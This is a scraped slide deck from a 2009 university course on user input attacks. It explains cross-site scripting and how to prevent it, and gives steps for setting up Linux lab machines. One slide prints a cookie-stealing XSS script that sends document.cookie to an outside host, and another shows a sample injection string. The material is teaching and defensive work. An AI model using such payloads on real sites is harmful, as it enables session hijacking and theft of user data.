User Input Attacks CPSC 328 Spring 2009 Review Abstract lower - - PDF document

user input attacks
SMART_READER_LITE
LIVE PREVIEW

User Input Attacks CPSC 328 Spring 2009 Review Abstract lower - - PDF document

Sep 21, 2022 148 likes •221 views

User Input Attacks CPSC 328 Spring 2009 Review Abstract lower level security Provide end-to-end security User security info to server WS Security XML Encryption XML Signature Tokens

slide-1
SLIDE 1

1

User Input Attacks

CPSC 328 Spring 2009

Review

  • Abstract lower level security
  • Provide end-to-end security
  • User security info to server
  • WS Security
  • XML Encryption
  • XML Signature
  • Tokens
  • Authentication/Authorization
  • SAML
  • XACML
  • SSO
  • Gathering System Information
  • Site mapping
  • Comments/error codes
  • Library/plugin vulnerabilities
slide-2
SLIDE 2

2

User Input

  • Can not trust anything coming from user
  • Form data
  • URLs
  • Scripts
  • Must hold input as suspect until

processed/cleared somehow

  • Let the games begin…

Cross-Site Scripting

  • Trick some poor soul into giving you their data
  • Embed code into HTML
  • Subset of HTML injection
  • Can happen when server accepts data from user & sends to

web browser without validation/encoding

  • When user connects to site, script runs
  • Most frequent vector: JavaScript
  • Outcomes
  • Data is sent (stolen) to another server
  • Web sites defaced
  • Control user’s browser
slide-3
SLIDE 3

3

XSS: Details

  • Three forms
  • Stored, reflected, & DOM injection
  • Target Sites
  • Blogs, Forums, Forms
  • Anything that receives & displays info back to user
  • What sort of data is targeted?
  • Session IDs
  • Personal info
  • Anything affiliated with the current page
  • Can rewrite page or steal user info

XSS: Tags

  • Some vulnerable tags
  • Script, html, body, img, object, applet, frame,

frameset, iframe, layer, style, embed, meta, href

  • How compromised?
  • Form input stored for display
  • URL/link mangling (embedded script)
  • Web bugs to send cookie:

<script> document.write(“<img src=\”http:innocent.com/bug.gif? cookie=“+document.cookie+”\””) </script>

slide-4
SLIDE 4

4

Poking for Holes

  • Try script-ish characters in input, see what

happens

  • <, >, /, :, ‘,
  • Example (misusing a text entry field):
  • Character encoding to hide
  • Brackets, “script” “java”, etc

username: ‘); bad_code_here;// password:

Movie

Prevention

  • Can try to rule out all the “bad stuff”
  • Difficult to do
  • Always finding new “bad stuff”
  • Easier to enumerate the “good stuff”
  • Use different formatting tags for text entry

(blogs, etc)

  • Encode all user-entered text
slide-5
SLIDE 5

5

Prevention Details

  • Validate Input (before using it)
  • accept known good, reject bad input
  • Encode output (before sending to browser)
  • Strong encoding, do almost everything
  • Specify Output Encoding
  • Specify Document Encoding
  • Don’t User Blacklisting for Validation
  • Again, easier to whitelist than blacklist

Machine Setup

  • Make sure sitting at machine #
  • 4, 12, 15, 17, 19, 22, 24
  • Boot to Linux
  • Create account
  • Setup apache
  • Setup SSH
slide-6
SLIDE 6

6

Create Account

  • Log in
  • User: cpsc
  • Passwd: cpsccpsc
  • Su (passwd: cpsccpsc)
  • Create your account
  • <login>: last name
  • password: something you can remember
  • useradd -c “<firstname> <lastname>” -m <login>
  • passwd <login>
  • Enter password when prompted
  • Logout (entirely)

Config Machine

  • Log in as you
  • Kill off things you don’t need
  • Mail, samba, wireless, cupsd, bind, nfsd
  • Launch/config the following:
  • Apache (httpd), sshd, ntpd, mysqld
  • For now, just get them running in multi-user

mode (run level 3 - 5)

  • Don’t worry about firewalls (for now)